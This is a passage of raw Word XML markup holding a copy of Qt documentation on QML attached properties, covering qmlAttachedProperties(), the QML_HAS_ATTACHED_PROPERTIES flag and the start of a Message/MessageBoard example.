        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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qmlAttachedProperties</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QObject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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object</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0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This method should return an instance of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached object type</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="00DA77C2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00082341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The QML engine invokes this method</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B7F34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in order to attach an instance of the attached object type to the</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7F34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B7F34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attachee</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7F34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B7F34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>specified by the</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7F34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B7F34">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r w:rsidR="00082341" w:rsidRPr="003B7F34">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B7F34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>parameter</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. It is customary, though not strictly required, for this method implementation to parent the returned instance to</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object</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in order to prevent memory leaks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="00DA77C2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This method is called at most once by the engine for each attachee object instance, </w:t>
      </w:r>
      <w:r w:rsidRPr="00082341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as the engine caches the returned instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> pointer for subsequent attached property accesses. Consequently the attachment object </w:t>
      </w:r>
      <w:r w:rsidRPr="00082341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">may not be </w:t>
      </w:r>
      <w:r w:rsidRPr="003B7F34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>deleted until the attachee</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7F34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B7F34">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7F34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B7F34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is destroyed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is declared as an attaching type, by calling the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId251" w:anchor="QML_DECLARE_TYPEINFO" w:history="1">
        <w:r w:rsidRPr="00082341">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML_DECLARE_TYPEINFO</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">() macro with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00082341">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML_HAS_ATTACHED_PROPERTIES</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="003B7F34">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="298" w:name="implementing-attached-objects-an-example"/>
      <w:bookmarkStart w:id="299" w:name="_Toc483000595"/>
      <w:bookmarkStart w:id="300" w:name="_Toc483603948"/>
      <w:bookmarkStart w:id="301" w:name="_Toc483605168"/>
      <w:bookmarkEnd w:id="298"/>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Implementing Attached Objects: An Example</w:t>
      </w:r>
      <w:bookmarkEnd w:id="299"/>
      <w:bookmarkEnd w:id="300"/>
      <w:bookmarkEnd w:id="301"/>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For example, take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w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type described in an</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId252" w:anchor="registering-an-instantiable-object-type" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>earlier example</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Message : </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QObject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 xml:space="preserve">    Q_OBJECT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 xml:space="preserve">    Q_PROPERTY(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QString</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> author READ author WRITE setAuthor NOTIFY authorChanged)</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 xml:space="preserve">    Q_PROPERTY(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QDateTime</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> creationDate READ creationDate WRITE setCreationDate NOTIFY creationDateChanged)</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keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="comment"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// ...</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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Suppose it is necessary to trigger a signal on a</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w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>when it is published to a message board, and also track when the message has expired on the message board. Since it doesn't make sense to add these attributes directly to a</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w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, as the attributes are more relevant to the message board context, they could be implemented as</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attributes on a</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w:t>
      </w:r>
      <w:r w:rsidR="00CE3438">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object that are provided through a "MessageBoard" qualifier. In terms of the concepts described earlier, the parties involved here are:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>An instance of an anonymous</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached object type</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, which provides a</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
